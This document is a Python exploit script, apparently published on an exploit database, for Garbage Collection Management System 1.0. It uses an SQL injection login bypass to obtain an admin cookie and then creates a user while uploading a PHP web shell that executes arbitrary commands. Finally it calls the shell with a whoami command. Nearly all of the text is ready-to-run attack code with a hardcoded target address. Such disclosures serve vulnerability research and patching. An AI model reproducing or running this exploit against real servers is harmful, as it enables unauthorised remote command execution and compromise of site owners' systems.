Garbage Collection Management System version 1.0 shell upload exploit that leverages a SQL injection vulnerability.
ea34ecce44fb54eefcd9fffe39d45a35
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
# Date: 05-07-2021
# Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# POC: https://www.exploit-db.com/exploits/50085
# Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)
# Version: 1.0
#======================================================
#imports
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
import string
import random
import os
import argparse
#generate random string 8 chars
def randomGen(size=8, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
#generating a random username and a random web shell file
user=randomGen()
shellFile=randomGen()+".php"
#creating a payload for the login
payload = {
"username":"a",
"password":"a' OR 1=1 AND ucat='admin' #"
}
proxies = {"http":"http://127.0.0.1:8080"}
session=requests.Session()
#changeme
urlBase="http://172.27.1.71/Gabage/"
url=urlBase+"login.php"
print("=== executing SQL Injection ===")
req=session.post(url,payload,allow_redirects=False)
cookie=req.headers["Set-Cookie"]
print("=== authenticated admin cookie:" + cookie + " ===")
url=urlBase+"apatient/users.php?user=rayat"
mp_encoder = MultipartEncoder(
fields = {
"fullname":user,
"ucat":"admin",
"contact":"0000000000",
"address":"aaa ave",
"username":user,
"acstatus":"active",
"date":"2021-07-05",
"password":user,
"image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),
"submit":""
}
)
headers = {
"Cookie":cookie,
'Content-Type': mp_encoder.content_type
}
print("=== creating user " + user + " and uploading shell " + shellFile +" ===")
req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)
#curl the shell for test
requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"
print("=== issuing a whoami: " + requestUrl + " ===")
print("===CURL OUTPUT===")
os.system(requestUrl)